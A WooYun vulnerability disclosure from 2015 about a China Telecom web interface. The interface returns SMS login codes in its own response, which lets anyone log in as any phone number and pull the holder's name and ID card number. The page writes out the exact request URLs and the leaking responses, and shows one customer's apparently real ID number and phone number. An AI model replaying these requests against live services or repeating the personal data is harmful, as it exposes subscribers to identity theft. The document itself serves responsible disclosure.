当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134389

漏洞标题:利用某接口漏洞获取任意电信号码开户资料/身份证信息泄露

相关厂商:中国电信

漏洞作者: 滥好人

提交时间:2015-08-18 18:24

修复时间:2015-10-03 11:12

公开时间:2015-10-03 11:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:


详细说明:

漏洞页面:http://tyclub.telefen.com/newjf_hgo2/html/HGOIndex_em.html
点我的账户,出来用户登临,这时获取验证码,抓包发现是直接

GET:http://tyclub.telefen.com/newlife/interface/setMsCode?DeviceNo=+手机号码+&SmsCode=13


且返回值里出现获取的验证码:

{"ErrCode":"0000","ErrMsg":"随机码下发成功","SmsCode":"221241","AppCode":"KHD","ResponseDate":"20150815222855","Sign":"091bf21c88c45d3515ff1074e6297f0f172.17.57.21"}


这时提交手机号码和验证码:

GET:http://tyclub.telefen.com/newlife/interface/msCodeLogin?Mobile=+手机号+&MsCode=+验

证码
返回值为:

{"Cust_ID":"100011925987","CustName":"高)","CertificateType":"1","CertificateCode":"142231199103043011","CustStatus":"正常","ProvinceCustID":"123009557096","CustCardNo":"","ExtendField":"7","ProvinceID":"11","AreaID":"512","UserAccount":null,"Integral":257,"Voucher":0,"CustLevel":"4","Sex":null,"AppCode":"KHD","ResponseDate":"20150815223108","Sign":"765880bc26a57c0fbf875631fa9b5c40","ErrCode":"0000","ErrMsg":"成功","UsableBonus":"","phone":"18115672121","UserImg":"","type":""}


一目了然,账户开户资料,姓名身份证都出来了。

漏洞证明:

123.png


2345.png


QQ图片20150815223332.png


自己利用这个接口做了这个软件,只为证明改漏洞危害性,切无外传

修复方案:

版权声明:转载请注明来源 滥好人@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-19 11:10

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-16 18:25 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    查水表利器啊

  2. 2015-08-16 19:00 | 炊烟 ( 普通白帽子 | Rank:238 漏洞数:44 | 每一天都需要努力。)

    mark

  3. 2015-08-16 19:33 | 卖C4的小男孩 ( 实习白帽子 | Rank:65 漏洞数:6 | 啦啦啦 啦啦啦 我是一个卖C4的小行家!...)

    然而我用的是中国移不动。

  4. 2015-08-16 19:55 | scanf ( 核心白帽子 | Rank:1267 漏洞数:189 | 。)

    然而中国移动是加固过的一样的那么多漏洞

  5. 2015-08-16 20:32 | prolog ( 普通白帽子 | Rank:567 漏洞数:108 | 低调求发展)

    改用阿里170卡了。。应该靠谱吧

  6. 2015-08-16 23:47 | 千牛 ( 路人 | 还没有发布任何漏洞 | 敢想敢做,come on)

    私密哈,看接口张啥样